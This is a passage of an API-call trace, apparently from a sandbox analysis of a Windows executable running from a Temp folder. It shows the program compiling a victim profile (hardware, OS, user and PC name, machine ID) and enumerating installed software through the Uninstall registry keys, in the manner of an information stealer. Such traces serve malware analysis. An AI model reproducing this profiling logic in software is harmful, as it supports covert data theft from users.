IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508" [0175.875] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="14.25.28508", lpcbData=0x197fd4*=0xc) returned 0x0 [0175.875] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 " [0175.875] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 ", lpString2="14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508" [0175.875] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n" [0175.875] RegCloseKey (hKey=0x354) returned 0x0 [0175.875] RegEnumKeyExA (in: hKey=0x358, dwIndex=0xf, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.876] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}") returned 90 [0175.876] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.876] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x197fd4*=0x3b) returned 0x0 [0175.876] lstrlenA (lpString="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned 58 [0175.876] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n", lpString2="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005" [0175.876] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="12.0.21005", lpcbData=0x197fd4*=0xb) returned 0x0 [0175.876] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 " [0175.876] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 ", lpString2="12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005" [0175.876] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n" [0175.876] RegCloseKey (hKey=0x354) returned 0x0 [0175.876] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x10, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.876] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757") returned 100 [0175.876] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.876] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.876] RegCloseKey (hKey=0x354) returned 0x0 [0175.876] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x11, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.876] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173") returned 100 [0175.876] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.877] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.877] RegCloseKey (hKey=0x354) returned 0x0 [0175.877] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x12, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.877] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860") returned 100 [0175.877] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.877] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.877] RegCloseKey (hKey=0x354) returned 0x0 [0175.877] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x13, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.877] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655") returned 100 [0175.877] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.877] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.877] RegCloseKey (hKey=0x354) returned 0x0 